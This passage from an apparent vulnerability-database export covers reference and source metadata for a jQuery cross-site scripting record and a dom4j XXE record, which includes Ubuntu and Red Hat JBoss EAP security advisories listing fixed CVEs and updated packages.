"https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@%3cuser.flink.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@%3cuser.flink.apache.org%3e", }, { trust: 0.7, url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6@%3ccommits.roller.apache.org%3e", }, { trust: 0.6, url: "https://www.ibm.com/support/pages/node/1105515", }, { trust: 0.6, url: "https://www.ibm.com/support/pages/node/1105509", }, { trust: 0.6, url: "https://www.ibm.com/support/pages/node/1105479", }, { trust: 0.6, url: "https://www.ibm.com/support/pages/node/1106577", }, { trust: 0.6, url: "http://www.ibm.com/support/docview.wss?uid=ibm10874666", }, { trust: 0.6, url: "https://fortiguard.com/psirt/fg-ir-18-013", }, { trust: 0.6, url: "https://www.ibm.com/support/docview.wss?uid=ibm10967469", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-a-cross-site-scripting-vulnerability-in-jquery-affects-ibm-infosphere-information-server/", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/159353/red-hat-security-advisory-2020-3936-01.html", }, { trust: 0.6, url: "https://www-01.ibm.com/support/docview.wss?uid=ibm10878200", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerabilities-in-swagger-ui-affect-ibm-business-automation-workflow-and-ibm-business-process-manager-bpm/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilites-affect-ibm-jazz-foundation-and-ibm-engineering-products-5/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2019.4294/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-and-vulnerable-library-jquery-v1-11-1-affects-ibm-engineering-workflow-management/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerabilities-in-swagger-ui-affect-ibm-business-automation-workflow-and-ibm-business-process-manager-bpm-2/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2021.0465", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/156630/red-hat-security-advisory-2020-0729-01.html", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/78866", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/156941/red-hat-security-advisory-2020-0983-01.html", }, { trust: 0.6, url: "https://www.ibm.com/support/pages/node/1105497", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3875/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.1016/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2021.1519", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3902/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.0832/", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/170821/red-hat-security-advisory-2023-0552-01.html", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2023.0585", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/159852/red-hat-security-advisory-2020-4847-01.html", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2021.2525", }, { trust: 0.6, url: "http://www-01.ibm.com/support/docview.wss?uid=ibm10874666", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-using-components-with-known-vulnerabilities-10/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-qradar-siem-is-vulnerable-to-using-components-with-known-vulnerabilities-8/", }, { trust: 0.6, url: "https://us-cert.cisa.gov/ics/advisories/icsma-21-187-01", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2023.0583", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-qradar-analyst-workflow-add-on-to-ibm-qradar-siem-is-vulnerable-to-using-components-with-known-vulnerabilities-2/", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerability-issues-affect-ibm-spectrum-symphony-7-3-1/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/79122", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.0494/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/78794", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/156315/red-hat-security-advisory-2020-0481-01.html", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3267/", }, { trust: 0.6, url: "https://us-cert.cisa.gov/ics/advisories/icsa-22-097-01", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.1076/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2020.3368/", }, { trust: 0.6, url: "https://packetstormsecurity.com/files/170823/red-hat-security-advisory-2023-0553-01.html", }, { trust: 0.6, url: "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-3/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2019.3165/", }, { trust: 0.6, url: "https://www.auscert.org.au/bulletins/esb-2022.1512", }, { trust: 0.5, url: "https://access.redhat.com/security/team/contact/", }, { trust: 0.5, url: "https://access.redhat.com/security/cve/cve-2015-9251", }, { trust: 0.5, url: "https://bugzilla.redhat.com/):", }, { trust: 0.4, url: "https://access.redhat.com/security/updates/classification/#important", }, { trust: 0.3, url: "https://access.redhat.com/security/team/key/", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2018-14040", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2018-14040", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2018-14042", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2020-11022", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2016-10735", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2019-11358", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2016-10735", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2020-11022", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2019-8331", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2018-14042", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2019-8331", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2019-11358", }, { trust: 0.3, url: "https://access.redhat.com/articles/11258", }, { trust: 0.3, url: "https://www.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2020-11023", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-40150", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2022-3143", }, { trust: 0.2, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-42003", }, { trust: 0.2, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-42004", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2018-14041", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2022-40150", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-45047", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2017-18214", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2022-40152", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2022-40149", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-40149", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2020-11023", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-40152", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2018-14041", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2017-18214", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-45693", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-46364", }, { trust: 0.2, url: "https://issues.jboss.org/):", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2022-3143", }, { trust: 0.2, url: "https://listman.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.2, url: "https://access.redhat.com/security/cve/cve-2019-10174", }, { trust: 0.2, url: "https://nvd.nist.gov/vuln/detail/cve-2019-10174", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2023:0554", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2023:0553", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=jboss.amq.broker&downloadtype=securitypatches&version=6.3.0", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=jboss.fuse&downloadtype=securitypatches&version=6.3", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_jboss_fuse/6.3/html/release_notes/index", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2020-1722", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-20676", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2020-1722", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-20676", }, { trust: 0.1, url: "https://access.redhat.com/security/updates/classification/#moderate", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-20677", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:4670", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-20677", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-9513", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-9514", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-9517", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-10184", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-14379", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-9515", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-11771", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-5427", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-9512", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-9514", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-12422", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-3888", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-9517", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-9515", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-5929", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-12422", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-14439", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-9516", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-9518", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-11272", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.6/", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-17570", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-3888", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-9513", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-17570", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions&product=jboss.fuse&version=7.6.0", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-5929", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-11771", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-14439", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-3802", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-12814", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-9512", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-10184", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-12384", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-15756", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-5427", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-15756", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-16012", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-12384", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-11272", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-9516", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-3802", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-12814", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2019-9518", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-16012", }, { trust: 0.1, url: "https://access.redhat.com/errata/rhsa-2020:0983", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2019-14379", }, ], sources: [ { db: "VULHUB", id: "VHN-87212", }, { db: "BID", id: "105658", }, { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "PACKETSTORM", id: "170819", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "156315", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "156941", }, { db: "CNNVD", id: "CNNVD-201801-798", }, { db: "NVD", id: "CVE-2015-9251", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-87212", }, { db: "BID", id: "105658", }, { db: "JVNDB", id: "JVNDB-2015-008097", }, { db: "PACKETSTORM", id: "170819", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "156315", }, { db: "PACKETSTORM", id: "159876", }, { db: "PACKETSTORM", id: "156941", }, { db: "CNNVD", id: "CNNVD-201801-798", }, { db: "NVD", id: "CVE-2015-9251", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2018-01-18T00:00:00", db: "VULHUB", id: "VHN-87212", }, { date: "2018-01-18T00:00:00", db: "BID", id: "105658", }, { date: "2018-02-16T00:00:00", db: "JVNDB", id: "JVNDB-2015-008097", }, { date: "2023-01-31T17:19:24", db: "PACKETSTORM", id: "170819", }, { date: "2023-01-31T17:26:38", db: "PACKETSTORM", id: "170823", }, { date: "2020-02-12T18:53:35", db: "PACKETSTORM", id: "156315", }, { date: "2020-11-04T15:32:52", db: "PACKETSTORM", id: "159876", }, { date: "2020-03-27T13:16:40", db: "PACKETSTORM", id: "156941", }, { date: "2018-01-22T00:00:00", db: "CNNVD", id: "CNNVD-201801-798", }, { date: "2018-01-18T23:29:00.307000", db: "NVD", id: "CVE-2015-9251", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2021-01-08T00:00:00", db: "VULHUB", id: "VHN-87212", }, { date: "2019-07-17T07:00:00", db: "BID", id: "105658", }, { date: "2021-07-08T08:40:00", db: "JVNDB", id: "JVNDB-2015-008097", }, { date: "2023-02-02T00:00:00", db: "CNNVD", id: "CNNVD-201801-798", }, { date: "2024-11-21T02:40:09.093000", db: "NVD", id: "CVE-2015-9251", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "remote", sources: [ { db: "CNNVD", id: "CNNVD-201801-798", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "jQuery Cross-site Scripting Vulnerability", sources: [ { db: "JVNDB", id: "JVNDB-2015-008097", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "xss", sources: [ { db: "PACKETSTORM", id: "156315", }, { db: "CNNVD", id: "CNNVD-201801-798", }, ], trust: 0.7, }, }
var-202005-1054
Vulnerability from variot
dom4j before 2.0.3 and 2.1.x before 2.1.3 allows external DTDs and External Entities by default, which might enable XXE attacks. However, there is popular external documentation from OWASP showing how to enable the safe, non-default behavior in any application that uses dom4j. dom4j is an open source framework for processing XML. A code issue vulnerability exists in dom4j versions prior to 2.0.3 and 2.1.x versions prior to 2.1.3. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products. ========================================================================== Ubuntu Security Notice USN-4575-1 October 13, 2020
dom4j vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 LTS
Summary:
dom4j could be made to expose sensitive information or run programs if it received specially crafted input.
Software Description: - dom4j: Flexible XML framework for Java
Details:
It was discovered that dom4j incorrectly handled reading XML data. A remote attacker could exploit this with a crafted XML file to expose sensitive data or possibly execute arbitrary code. (CVE-2020-10683)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 LTS: libdom4j-java 1.6.1+dfsg.3-2ubuntu1.1
In general, a standard system update will make all the necessary changes. Description:
Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: Red Hat JBoss Enterprise Application Platform 7.3.2 security update Advisory ID: RHSA-2020:3461-01 Product: Red Hat JBoss Enterprise Application Platform Advisory URL: https://access.redhat.com/errata/RHSA-2020:3461 Issue date: 2020-08-17 CVE Names: CVE-2019-14900 CVE-2020-1710 CVE-2020-1748 CVE-2020-10672 CVE-2020-10673 CVE-2020-10683 CVE-2020-10687 CVE-2020-10693 CVE-2020-10714 CVE-2020-10718 CVE-2020-10740 CVE-2020-14297 =====================================================================
- Summary:
An update is now available for Red Hat JBoss Enterprise Application Platform 7.3 for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat JBoss EAP 7.3 for RHEL 6 Server - noarch
- Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.
This release of Red Hat JBoss Enterprise Application Platform 7.3.2 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.3.1, and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise Application Platform 7.3.2 Release Notes for information about the most significant bug fixes and enhancements included in this release.
Security Fix(es):
-
wildfly: exposed setting of TCCL via the EmbeddedManagedProcess API (CVE-2020-10718)
-
dom4j: XML External Entity vulnerability in default SAX parser (CVE-2020-10683)
-
wildfly-elytron: session fixation when using FORM authentication (CVE-2020-10714)
-
wildfly-undertow: Undertow: Incomplete fix for CVE-2017-2666 due to permitting invalid characters in HTTP requests (CVE-2020-10687)
-
jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution (CVE-2020-10673)
-
hibernate-core: hibernate: SQL injection issue in Hibernate ORM (CVE-2019-14900)
-
wildfly: unsafe deserialization in Wildfly Enterprise Java Beans (CVE-2020-10740)
-
jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution (CVE-2020-10672)
-
undertow: EAP: field-name is not parsed in accordance to RFC7230 (CVE-2020-1710)
-
hibernate-validator: Improper input validation in the interpolation of constraint error messages (CVE-2020-10693)
-
wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain (CVE-2020-1748)
-
wildfly: Some EJB transaction objects may get accumulated causing Denial of Service (CVE-2020-14297)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, see the CVE page(s) listed in the References section.
- Solution:
Before applying this update, ensure all previously released errata relevant to your system have been applied.
For details about how to apply this update, see:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1666499 - CVE-2019-14900 hibernate: SQL injection issue in Hibernate ORM 1694235 - CVE-2020-10683 dom4j: XML External Entity vulnerability in default SAX parser 1785049 - CVE-2020-10687 Undertow: Incomplete fix for CVE-2017-2666 due to permitting invalid characters in HTTP requests 1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230 1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages 1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain 1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication 1828476 - CVE-2020-10718 wildfly: exposed setting of TCCL via the EmbeddedManagedProcess API 1834512 - CVE-2020-10740 wildfly: unsafe deserialization in Wildfly Enterprise Java Beans 1853595 - CVE-2020-14297 wildfly: Some EJB transaction objects may get accumulated causing Denial of Service
- JIRA issues fixed (https://issues.jboss.org/):
JBEAP-18793 - GSS Upgrade Hibernate ORM from 5.3.16 to 5.3.17 JBEAP-19095 - GSS Upgrade wildfly-http-client from 1.0.20 to 1.0.21 JBEAP-19134 - (7.3.z) Upgrade HAL from 3.2.8.Final-redhat-00001 to 3.2.9.Final JBEAP-19185 - (7.3.z) Upgrade IronJacamar from 1.4.20.Final to 1.4.22.Final JBEAP-19203 - (7.3.z) WFCORE-4850 - Updating mockserver to 5.9.0. Exclusion of dependency from xom.io7m JBEAP-19205 - (7.3.z) Upgrade WildFly Core from 10.1.5.Final-redhat-00001 to 10.1.x JBEAP-19269 - GSS Upgrade jboss-logmanager from 2.1.14.Final to 2.1.15.Final JBEAP-19322 - (7.3.z) Upgrade XNIO from 3.7.7 to 3.7.8.SP1 JBEAP-19325 - (7.3.z) Upgrade Infinispan from 9.4.18.Final-redhat-00001 to 9.4.19.Final-redhat-00001 JBEAP-19397 - (7.3.z) Upgrade JSF based on Mojarra 2.3.9.SP09-redhat-00001 to 2.3.9.SP11-redhat-00001 JBEAP-19409 - Tracker bug for the EAP 7.3.2 release for RHEL-6 JBEAP-19529 - (7.3.z) Update PR template to include PR-processor hints. JBEAP-19564 - GSS Upgrade jboss-ejb-client from 4.0.31.Final-redhat-00001 to 4.0.33.Final-redhat-00001 JBEAP-19585 - GSS Upgrade org.jboss.genericjms from 2.0.4 to 2.0.6 JBEAP-19617 - (7.3.z) Upgrade wildfly-naming-client from 1.0.12.Final-redhat-00001 to 1.0.13.Final-redhat-00001 JBEAP-19619 - (7.3.z) Upgrade JBoss JSF API from 3.0.0.SP02-redhat-00001 to 3.0.0.SP04-redhat-00001 JBEAP-19673 - (7.3.z) [WFCORE] Upgrade WildFly Common to 1.5.2.Final JBEAP-19674 - (7.3.z) [WFCORE] Upgrade galleon and wildfly-galleon-plugins from 4.1.2.Final to 4.2.4.Final JBEAP-19874 - GSS Upgrade wildfly-http-client from 1.0.21.Final-redhat-00001 to 1.0.22.Final-redhat-00001
- Package List:
Red Hat JBoss EAP 7.3 for RHEL 6 Server:
Source: eap7-dom4j-2.1.3-1.redhat_00001.1.el6eap.src.rpm eap7-elytron-web-1.6.2-1.Final_redhat_00001.1.el6eap.src.rpm eap7-glassfish-jsf-2.3.9-11.SP11_redhat_00001.1.el6eap.src.rpm eap7-hal-console-3.2.9-1.Final_redhat_00001.1.el6eap.src.rpm eap7-hibernate-5.3.17-1.Final_redhat_00001.1.el6eap.src.rpm eap7-hibernate-validator-6.0.20-1.Final_redhat_00001.1.el6eap.src.rpm eap7-infinispan-9.4.19-1.Final_redhat_00001.1.el6eap.src.rpm eap7-ironjacamar-1.4.22-1.Final_redhat_00001.1.el6eap.src.rpm eap7-jackson-annotations-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jackson-core-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jackson-databind-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jackson-jaxrs-providers-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jackson-modules-base-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jackson-modules-java8-2.10.4-1.redhat_00001.1.el6eap.src.rpm eap7-jboss-genericjms-2.0.6-1.Final_redhat_00001.1.el6eap.src.rpm eap7-jboss-jsf-api_2.3_spec-3.0.0-4.SP04_redhat_00001.1.el6eap.src.rpm eap7-jboss-logmanager-2.1.15-1.Final_redhat_00001.1.el6eap.src.rpm eap7-jboss-server-migration-1.7.1-7.Final_redhat_00009.1.el6eap.src.rpm eap7-jboss-xnio-base-3.7.8-1.SP1_redhat_00001.1.el6eap.src.rpm eap7-netty-4.1.48-1.Final_redhat_00001.1.el6eap.src.rpm eap7-undertow-2.0.30-4.SP4_redhat_00001.1.el6eap.src.rpm eap7-wildfly-7.3.2-4.GA_redhat_00002.1.el6eap.src.rpm eap7-wildfly-common-1.5.2-1.Final_redhat_00002.1.el6eap.src.rpm eap7-wildfly-elytron-1.10.7-1.Final_redhat_00001.1.el6eap.src.rpm eap7-wildfly-http-client-1.0.22-1.Final_redhat_00001.1.el6eap.src.rpm
noarch: eap7-dom4j-2.1.3-1.redhat_00001.1.el6eap.noarch.rpm eap7-glassfish-jsf-2.3.9-11.SP11_redhat_00001.1.el6eap.noarch.rpm eap7-hal-console-3.2.9-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-core-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-entitymanager-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-envers-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-java8-5.3.17-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-validator-6.0.20-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-hibernate-validator-cdi-6.0.20-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-cachestore-jdbc-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-cachestore-remote-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-client-hotrod-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-commons-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-core-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-hibernate-cache-commons-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-hibernate-cache-spi-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-infinispan-hibernate-cache-v53-9.4.19-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-common-api-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-common-impl-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-common-spi-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-core-api-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-core-impl-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-deployers-common-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-jdbc-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-ironjacamar-validator-1.4.22-1.Final_redhat_00001.1.el6eap.noarch.rpm eap7-jackson-annotations-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-core-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-databind-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-datatype-jdk8-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-datatype-jsr310-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-jaxrs-base-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-jaxrs-json-provider-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-module-jaxb-annotations-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-modules-base-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm eap7-jackson-modules-java8-2.10.4-1.redhat_00001.1.el6eap.noarch.rpm 